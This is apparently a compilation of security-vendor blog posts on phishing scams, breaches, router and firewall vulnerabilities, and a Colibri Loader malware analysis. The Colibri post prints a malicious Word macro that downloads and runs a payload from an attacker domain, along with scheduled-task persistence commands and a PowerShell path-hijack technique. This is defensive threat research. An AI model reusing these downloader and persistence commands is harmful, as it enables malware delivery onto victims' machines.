IT NEWS

Thanks to the Threat Intelligence team for their help with this article.

Security researchers from Armorblox, a cybersecurity company specializing in email-based threats, have encountered a fake WhatsApp email with the subject “New Incoming Voicemessage.”

The sender is “Whatsapp Notifier,” a spoofed name, and an email address using a legitimate domain belonging to a Russian road safety organization, to sneak through mail filters.

Recipients are encouraged to click a “Play” button and listen to their voicemail. That doesn’t happen, though—clicking “Play” directs recipients to a page where Aromorblox found an obfuscated, malicious JavaScript that redirected users to another page. The second page included an exploit, triggered when users responded to an Allow/Block prompt.

Prompts like this are also used by malvertisers when they want to push ads in front of users.

Ads can include (but are not limited to) scam sites, portals for unwanted browser extensions (PUPs), and even malware. The ads vary depending on a user’s device and location.

When we clicked the “Allow” button during our own testing, we were signed up to receive notifications from bingocaptchapoint.top.

The domain we had agreed to receive notifications from then used its priveleged position to redirect us to a page with a bogus offer.

Ten seconds after subscribing we hit our first ad: A Google Chrome “search contest”. And will you look at that?—we won!

This is one of many WhatsApp voicemail message scams. Another variant, detailed by Scam Detector, tricks Android users into downloading a payload called “Browser 6.5” which signs them up to receive text messages from premium rate phone numbers, for example.

What to do?

If you’re a WhatsApp user, remain vigilant and stay up to date with changes to WhatsApp’s services, so you know how they work. (For example, WhatsApp recently announced six changes to its voice message service.)

Check what you are approving before clicking “Allow” on browser prompts, and use a security tool that can block malicious sites and scripts.

and if you sign up for notifications from a site by accident you can remove it in Google Chrome by following these steps: Open Settings, click Privacy and Security, click Site Settings, click Notifications, scroll to Allowed to send notifications. Click the “three dots” icon next to the site you want to remove and click Remove.

If you believe you have fallen victim to this scam—or any other—at work, report the incident to your IT or security team.

Stay safe!

The post Watch out for fake WhatsApp “New Incoming Voicemessage” emails appeared first on Malwarebytes Labs.

In December last year, the customer information of Cash App users was accessed by a former employee of Block, the company behind the popular mobile payment service app. This was revealed in a very recent filing to the Securities and Exchange Commission (SEC), which shows that the former employee accessed and downloaded “certain reports” containing US customer information.

The filing reads:

“While this employee had regular access to these reports as part of their past job responsibilities, in this instance these reports were accessed without permission after their employment ended.”

Cash App is currently in the process of reaching out to its 8.2 million US users about the breach. That includes current and former Cash App users.

The compromised data contains full names and brokerage portfolio values. The filling explains the latter as “the unique identification number associated with customer’s stock activity on Cash App Investing”.

The document also clarified that compromised data “did not include usernames or passwords, Social Security numbers, date of birth, payment card information, addresses, bank account information, or any other personally identifiable information.” Security code, access code, or Cash App account passwords were also not part of the breached data.

According to an email interview with Vice, a Cash App spokesperson said they have already taken remediating steps, and launched an investigation “with the help of a leading forensics firm”.

We have yet to find out exactly how this former employee could still reach assets they should no longer be able to access after separating from their employer. Sadly, incidents like this happen all the time. Multiple studies have shown that many organizations’ former employees, regardless of the nature of their termination, can still access not just corporate data but also platforms used by their former employers. Such incidents are not only classified as insider threat incidents, but they are also good examples of many companies having improper offboarding practices.

Cash App can only be used in the US and UK. No UK customers were affected by this breach.

The post Cash App breached by a former employee could affect millions appeared first on Malwarebytes Labs.

Unfortunately scammers continue to focus on the invasion of Ukraine to make money. A flurry of bogus domains and scam techniques are spreading their wings. They appear to focus on donation fakeouts but there’s a few other nasty surprises lying in wait too.

The lowest of the low

There are few lower tactics than fake fundraising during times of crisis. It was rife during the earthquake and tsunami of 2011, with bogus Red Cross websites and email addresses set up to part people from their money. Money that could have been life-saving was diverted into the pockets of thieves. So too does history repeat itself during the invasion.

Reports indicate a big run on phishing and scams. According to email security firm Tessian, registrations of domains containing “Ukraine” have increased by 210% compared to last year. Perhaps that’s to be expected—the question is how many are genuine and how many are potential rip-off efforts. Tessian’s stats suggest that three quarters are suspicious:

An average of 315 new Ukraine themed domains have been observed per day since the 24th February. 77% of these domains appear to be suspicious based on early indicators. 

Fake it to make it

The tactics used match those deployed in 2011, and pretty much every other major catastrophe. Liberal use of official organisation logos and design which matches the real deal are all common. Where scams sometimes diverge from real fundraising sites is in requesting payment via cryptocurrency. There’s even some QR codes thrown into the mix.

One example given leans into the pressure angle, providing supposed commentary from a 16 year old. Given the horrendous scenes of devastation, this is bound to spur some folks into donating. Unfortunately it’ll only be lining the pockets of scammers.

There’s also word of sites selling Ukraine-themed products, such as t-shirts and other items. While those items aren’t likely to turn up, this is (potentially) less devastating than the donation sites given how much more people may be willing to send to charities.

This is, of course, all very bad. There are things you can do to lessen the risk from awful scams such as the above.

Tips to avoid donating to scammers

• If you receive a fundraising email out of the blue, don’t respond. Consider that reputable charity organisations won’t fire missives at you unless you’ve agreed to receive them. Instead, check with the organisation’s website directly—without using any links in the email.
• While cryptocurrency is being used for some forms of genuine donation, it’s a bear-pit out there, and this should be a red flag. Cryptocurrency scamming is rampant. As above, make your way to the official site of your chosen service and see what they’re doing in terms of donating.
• A sneaky trick donation scammers use is to ask you to reply to [insert scammer’s address], but also CC the mail of the target charity. This is to make it all look very genuine. They may claim the real address is overwhelmed, so you need to use the backup instead. It’s not a problem for the scammer to include a genuine mail as a CC, because they’re banking on the charity being so overwhelmed they won’t see it anyway. By the time somebody notices, you may have already replied to the faker and sent some money.

These tips should help you steer clear of the worst kind of scammers. Please do everything you can to ensure your donations reach those who need it the most, and leave the phishers with what they deserve: a big stack of nothing.

The post Beware Ukraine-themed fundraising scams appeared first on Malwarebytes Labs.

On April 4 2022, the Cybersecurity & Infrastructure Security Agency (CISA) added CVE-2021-45382 to its known exploited vulnerabilities catalog. But since the affected products have reached end of life (EOL), the advice is to disconnect them, if still in use.

CISA catalog

The CISA catalog of known exploited vulnerabilities was set up to list the most important vulnerabilities that have proven to pose the biggest risks. The catalog is an integral part of binding operational directive (BOD) 22-01 titled Reducing the Significant Risk of Known Exploited Vulnerabilities.

This directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third-parties on an agency’s behalf. One of the most welcomed required actions set forth in the directive is that CISA will keep a catalog of vulnerabilities alongside timeframes in which they must be remediated.

EOL

End-of-life (EOL) is an expression commonly used by software vendors to indicate that a product or version of a product has reached the end of usefulness in the eyes of the vendor. When products reach End of Support (EOS) or EOL it is usually announced far in advance.

As a general policy, when products reach EOS/EOL, they can no longer be supported, and all firmware development for these products cease. Unfortunately this often means that the security of these products quickly decreases. Found vulnerabilities only get patched in very rare cases.

The vulnerability

CVE-2021-45382 is a Remote Code Execution (RCE) vulnerability that exists in all series H/W revisions D-Link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file.

DDNS (Dynamic Domain Name System) is a function that allows systems to overcome the issues related to Dynamic IP Addresses, in attempting to connect to a resource somewhere on the Internet whose IP address may change at any time.

The ncc2 service on the affected devices allows for basic firmware and language file upgrades via the web interface. The ncc2 service on the affected devices appears to have been shipped with a number of diagnostic hooks available. Unfortunately, these hooks are able to be called without authentication. The necessary resources do not exist on the filesystem of the device, nor do they appear to be static. Instead, these files appear to be rendered when queried and can be used to both interrogate the given device for information, as well as enable diagnostic services on demand.

A Proof of Concept (PoC) is publicly available on GitHub, which makes it trivial for anyone with malicious intentions to take control of the vulnerable routers.

Affected devices

D-Link lists the affected models that have reached EOL as DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L all series and all hardware revisions. All of these models were offered a last update on 19 December 2021.

D-Link’s advice for these models is for them to be retired and replaced. For organizations to be in compliance with the binding operational directive 22-01 this will need to be done before 25 April 2022.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice.

Mitigation

In these cases, and under the given circumstances, it seems indeed best to replace the affected models with a more secure device. Recently CISA gave a similar advice for the D-Link DIR-610 and DIR-645, as well as for the Netgear DGN2200.

Stay safe, everyone!

The post CISA advises D-Link users to take vulnerable routers offline appeared first on Malwarebytes Labs.

This blog post was authored by Ankur Saini, with contributions from Hossein Jazi and Jérôme Segura

Colibri Loader is a relatively new piece of malware that first appeared on underground forums in August 2021 and was advertised to “people who have large volumes of traffic and lack of time to work out the material“. As it names suggests, it is meant to deliver and manage payloads onto infected computers.

Our Threat Intelligence Team recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload. There is already published material about Colibri by CloudSek and independent researchers. Since most of the details about the bot have been covered, we decided to highlight a persistence technique we haven’t seen before.

Campaign attack chain

The attack starts with a malicious Word document deploying Colibri bot that then delivers the Vidar Stealer. The document contacts a remote server at (securetunnel[.]co) to load a remote template named trkal0.dot that contacts a malicious macro. This attack is known as remote template injection.

The macro enables PowerShell to download the final payload (Colibri Loader) as setup.exe:

Private Sub Document_Open()
zgotwed = "C:UsersPublicsetup.ex`e"
n87lcy4 = Replace("new:72Cs19e4ts4D", "s19e4ts", "2")
Set hu9v0dd = GetObject(n87lcy4 & "D5-D70A-438B-8A42-984" & CLng("1.8") & "4B88AFB" & CInt("8.1"))
hu9v0dd.exec "cm" & "d /c powers^hell -w hi Start-BitsTransfer -Sou htt`ps://securetunnel .co/connection/setup.e`xe -Dest " & zgotwed & ";" & zgotwed
End Sub

Abusing PowerShell for Persistence

Colibri leverages PowerShell in a unique way to maintain persistence after a reboot. Depending on the Windows version, Colibri drops its copy in %APPDATA%LocalMicrosoftWindowsApps and names it Get-Variable.exe for Windows 10 and above, while for lower versions it drops it in %DOCUMENTS%/WindowsPowerShell named as dllhost.exe

On Windows 7, it creates a scheduled task using the following command:

• schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “C:UsersadminDocumentsWindowsPowerShelldllhost.exe“

On Windows 10 and above, it creates a scheduled task using the following command:

• schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “powershell.exe -windowstyle hidden“

In the first scenario (Win7), we see a task pointing to the path of Colibri Loader. However, in the second we see an odd task to execute PowerShell with a hidden window. This is what we believe is a new persistence technique employed by the malware author.

As mentioned earlier, it drops the file with the name Get-Variable.exe in the WindowsApps directory. It so happens that Get-Variable is a valid PowerShell cmdlet (a cmdlet is a lightweight command used in the Windows PowerShell environment) which is used to retrieve the value of a variable in the current console.

Additionally, WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.

We reproduced this technique using the calculator to show how an adversary can easily achieve persistence combining a scheduled task and any payload (as long as it is called Get-Variable.exe and placed in the proper location):

A search on VirusTotal for the file name Get-Variable.exe indicates that the first malicious file uploaded to the platform happened last August, which matches with the time that Colibri appeared on XSS underground forums. That sample has the same networking features as Colibri which helps us ascertain with more confidence that the technique was debuted by Colibri.

Conclusion

Colibri is still in its infancy but it already offers many features for attackers and slowly seems to be gaining popularity. The persistence technique we outlined in this blog is simple but efficient and does not appear to be known.

Malwarebytes users are protected against this attack thanks to our Anti-Exploit layer:

IOCs

Word Document

666268641a7db3b600a143fff00a063e77066ad72ac659ebc77bb5d1acd5633d

setup.exe (Colibri)

54a790354dbe3ab90f7d8570d6fc7eb80c024af69d1db6d0f825c094293c5d77

install.exe (Vidar)

b92f4b4684951ff2e5abdb1280e6bff80a14b83f25e4f3de39985f188d0f3aad

The post Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs:

• New UAC-0056 activity: There’s a Go Elephant in the room
• Globant suffers network breach due to LAPSUS$ compromise
• Update now! Apple patches two zero-day vulnerabilities that may have been actively exploited
• Hive ransomware impacts California non-profit health organisation
• MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks
• Phishers make a date with your calendar apps
• Tech support scam campaign targets Japanese visitors to PornHub
• URI spoofing flaw could phish WhatsApp, Signal, Instagram, and iMessage users
• Ukraine shuts down disinformation bot farm
• Update now! Google launches Chrome version 100 and fixes 28 vulnerabilities
• “A little gift for you” SMS spam appears to come from your own phone number
• Watch out for LinkedIn fakes who want to get connected
• New spear phishing campaign targets Russian dissidents
• Attacks on Ukraine communications are a major part of the war
• Looking over your shoulder: when small mistakes have big consequences
• Satellites are critical infrastructure and need to be cybersecured
• Telling stories securely, with Runa Sandvik: Lock and Code S03E07
• Update now! Google releases emergency patch for Chrome zero-day used in the wild
• Tech support fraud is still very much alive, says latest FBI report

Stay safe!

The post A week in security (March 28 – April 3) appeared first on Malwarebytes Labs.

In a security advisory Zyxel has urged customers to update because a security flaw can lead to the circumvention of firewall protection in several Zyxel products.

Zyxel is a Taiwanese producer of modems and other networking equipment and its products are sold in over 150 countries.

The vulnerability

Zyxel says the vulnerability, listed as CVE-2022-0342, is an authentication bypass vulnerability caused by the lack of a proper access control mechanism, which has been found in the CGI program of some firewall versions. The flaw could allow an attacker to bypass the authentication and obtain administrative access of the device.

The Common Gateway Interface (CGI) is an interface specification that enables web servers to execute an external program, typically to process user requests.

Affected series

Zyxel has published a list of vulnerable products that are within their warranty and support period, and has released updates to address the issue.

From the security advisory it is unclear whether there are vulnerable products that are outside of the support period.

How to fix the Zyxel vulnerability

Administrators of the NSG V1.20 through V1.33 Patch 4 need to reach out to their local Zyxel support team for the file, or wait until May when standard patch V1.33 Patch 5 is scheduled to be released.

Owners of the other affected products can search for their updated firmware by model number on the Zyxel support download page. Please note that the patches should have a release date of 03/29/2022 or later.

For firewalls it is always a good idea to restrict the IP addresses that are permitted to access the management interface.

Stay safe, everyone!

The post Update now! Zyxel patches critical firewall bypass vulnerability appeared first on Malwarebytes Labs.

Holidays inspire fraudsters and scammers to create timely and effective ways to string people along and get them to give up either their money or their personal information. This is the case in this chocolate-themed scam.

Cadbury UK has issued a warning to its 315,000 followers on Twitter about a scam making the rounds on WhatsApp and other social media sites like Facebook.

Users of WhatsApp have reported receiving links to a web page where they can claim a “free Cadbury easter chocolate basket.”

When they open the link, users are presented with a short list of questions to answer—purportedly as part of an “Easter Egg Hunt”—before they are prompted to enter their personal details.

The Dorset Police Cyber Crime Unit posted an appeal about this scam to its Facebook page.

“DON’T CLICK THE LINK.” the post reads, the text bookended with the warning sign emoji. “Our Cyber Protect Officer has done it for you.”

The post continues with how the scam works:

“The site looks fairly convincing, however the only buttons that actually work are the ones to answer the questions. The search icon and the three little lines do nothing at all.

Once you answer those question [sic], you’re taken to a little game where you have to ‘find your prize’. Conveniently, your first and second tries won’t be successful, but you’ll ‘win’ on your third go! At that point, to claim your “prize”, you’ll be asked to hand over all sorts of personal information. That’s where the scam comes in!”

Looking at the shortened URL link (“tinyurl2.ru“) used in this campaign and how this scam campaign itself was formatted, it resembles the Amazon International Women’s Day 2022 Giveaway scam that is said to have gone viral in February.

It’s highly likely that scam links similar to these two can only be accessed via mobile devices.

This isn’t the first time Cadbury’s name has been dragged into a scam campaign. On December 2021, a Facebook scam about Cadbury reportedly giving away hampers of chocolate for Christmas did the rounds.

How to avoid falling for a scam like this

Warn your less security-savvy friends and family: When it comes to giveaways, think twice before clicking or sharing with friends, family, and social contacts. Scammers have always been on the prowl and do not rest until they get what they want. They are patient and have only got better at attempting to social engineer anyone who has a soft spot for anything—dogs, cats, commemorations, pizza, and, as we’ve just seen, chocolates.

Err on the side of caution. If you see a giveaway post in your feed, visit the official website of this brand to see if it’s genuine. Or, if they have a social media presence, which they usually do, ask on Twitter or Facebook. Send screenshots if you can.

It’s always a good idea to verify. But it’s not a good idea to click links thoughtlessly, and give your details away for delicious, delicious chocolate you can just buy from the shops.

Stay safe!

The post “Free easter chocolate basket” is a social media scam after your personal details appeared first on Malwarebytes Labs.

It is now officailly spring in the Northern Hemisphere, and with spring and the longer days comes the inescapable urge to shake off the lethargy of Winter and embrace the need to go through your stuff, throw a bunch of it out, and give the rest of it a shiny new lustre.

And in our increasingly digital lives, more and more of our stuff exists as bits and bytes on our phones, tablets, laptops and desktop computers. With the trees now full of blossom and the air prickling with pollen, the may feel an urge to straigten out your digital mess too.

If you do, we’ve got your back, and we humbly suggest that when you’re done tagging your dog in every photo and getting your folder names just so, you turn your attention to your device security and give that a little dust off as well. After all, nothing makes a bigger mess of your digital life than malware rummaging through it.

1. Say “yes” to software updates

Patching (downloading software updates) is like fixing the broken locks on the front doors of your digital life—the updates contain code that fixes weaknesses that thieves could otherwise jimmy open with their digital crowbars.

Start your spring clean by downloading all the software updates you’ve been putting off. Especially the big ones.

And yes, you’ve heard this advice before (we hope). Maybe you’ve heard it a hundred times, and maybe you’re heard it so often that you’re tired of hearing it and looking for some other advice. Well, fine, there’s some other advice below, but this is number one in our list for a reason, so please don’t skip it. This is the first and most important thing you can do to give your digtal security a spring boost.

2. Say “no” to duplicate passwords

How many online accounts do you have? Twenty, thirty, one hundred? And how many different passwords do you have for all those accounts? If the answer to these two questions isn’t exactly the same number—meaning that you have as many different passwords as you have different accounts—then you have some cleaning up to do.

Criminal hackers love it when you use the same password for more than one account. Once they’ve done the hard work of cracking one of your passwords they aren’t going to waste it, they’re going to try it on a laundry list of other websites to see what else it can unlock for them. It’s like a twofer at the grocery store for them: Hack one account, get one free!

The way to stop this is to create a unique password for each of your accounts, no exceptions. If you’re up for a deep clean then get yourself a password manager to make the job of creating and storing all those passwords easy. It’s a little more effort upfront, but well worth it.

3. Lose what you don’t use

We’re going to leave you to decide where you want to take this one and how far you want to go with it. We’ll just get you started with this simple line of thinking: From a security perspective, “more” is often worse. More apps means more places a hacker might find a broken lock or an open window they can use to break into your device. The same thing goes for your online accounts—each one is a potential way in to your digital life (particularly the accounts you haven’t used for a while, aren’t paying much attention to, or didn’t bother to lock down very well).

It’s amazing how many rarely-if-ever-used apps we accumulate on our devices, and how many accounts we open and then abandon online.

So why not lose some things? Ditch some apps you don’t need, clear out your unused browser add-ons, and delete some accounts you don’t use. The more you lose, the better.

4. Get on top of your email

Criminals use email to spread malware, fakes, and scams, so it is worth paying some attention to. Getting your unread email count to zero is immensely satisfying, and if you do it the right way it can give your security a spring in its step too.

Start by unsubscribing from all the mailing lists and newsletters you never read. You want the email that arrives in your inbox to be full of things that actually interest you, so it’s easier for you (and your spam filter) to spot anything that is slightly off. It’s just like step #3—lose what you don’t use.

Now go through your email and mark the things that look like scams, spams, malware, or junk as “Junk” or “Spam.” Every time you do that instead of just deleting shady emails you are actually training your email’s spam filter to work more effectively (if you want to know why, read our article on Bayesian Filtering). To work correctly your spam filter needs a few thousand up-to-date examples of both “good” emails and “bad” emails, so you want your inbox to be full of good things you care about, and your spam folder to be full of bad things that are malicious or spammy.

5. Run a malware scan

Spring cleaning is about the satisfaction of a job well done, and the peace of mind that comes with knowing your environment isn’t harbouring any nasties. To get that same sense of inner calm from your computer, put down the bleach and pick up a malware scanner.

A malware scanner is the quintessential deep clean for your device. It will pick over your files and apps, one by one, and run through them with a fine tooth comb, weeding out any malware that’s lurking in there undetected.

Now, we’re going to toot our own horn a little on this one. We try to give good, sensible, impartial advice on this blog, without somehow making everything about us and the things we make. Well it so happens that our scans are famous for their ability to pick up things that others miss, and it wouldn’t make any sense if we didn’t mention it when other people will happily tell you the same thing. So, if you want to scrub all the dark and difficult corners of your desktop or laptop computer, we honestly think the best advice we can give you is to run our anti-malware scanner. Sorry, not sorry.

The post 5 ways to spring clean your security appeared first on Malwarebytes Labs.

GitLab has issued several critical security updates, with users of the version control software urged to upgrade their installations as soon as possible. One of the fixes is for a hard coded password issue.

What is distributed version control?

Distributed version control is a way for an organisation’s codebase to be mirrored on the devices of anyone who needs access. Where people occasionally become confused is when they see a number of services using the word “Git” in their name. They’re not all the same thing, and we shouldn’t unnecessarily worry that one issue affects lots of different services due to naming conventions.

Are GitHub and GitLab the same thing?

They are not! If you’re reading about this update, you’re reading about an update for users of GitLab specifically. GitHub isn’t affected by this, and so users shouldn’t worry about missing security updates for hard-coded passwords. Hub and Lab are similar, but most definitely not the same.

What’s happened with GitLab?

There’s been a critical security release, addressing multiple issues. No fewer than 17 elements have been addressed, with one rated critical, two rated high, and nine rated medium. Here’s the rundown of the issue rated critical from their release page:

Static passwords inadvertently set during OmniAuth-based registration

A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This is a critical severity issue (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, 9.1). It is now mitigated in the latest release and is assigned CVE-2022-1162.

This vulnerability has been discovered internally by the GitLab team.

Note: We executed a reset of GitLab.com passwords for a selected set of users as of 15:38 UTC. Our investigation shows no indication that users or accounts have been compromised but we’re taking precautionary measures for our users’ security.

What are hardcoded passwords, and why are they bad?

Hardcoded passwords, also known as embedded credentials, make using the software or device they’re attached to a risky business. If your cheap, off the shelf router has the same single password in use for every single device, that’s bad. Someone who owns one of these devices now knows the password for all of those devices. If your forum software has a single, unchangeable password buried in the code, that’s bad. Somebody with dubious intentions may well have the keys to the kingdom for all versions of that forum.

It’s a similar story here – with a few caveats. According to The Register, accounts created through OmniAuth using fewer than 21 characters for the password were vulnerable to the default password. A script has also been released which, in GitLab’s words, “…can be used by self-managed instance admins to identify user accounts potentially impacted by CVE-2022-1162”.

Time to update

If you think you may be impacted by this, make haste and check out the list of updates. You don’t want to leave an easy way in for attackers to exploit your business.

The post GitLab issues security updates; watch out for hard coded passwords appeared first on Malwarebytes Labs.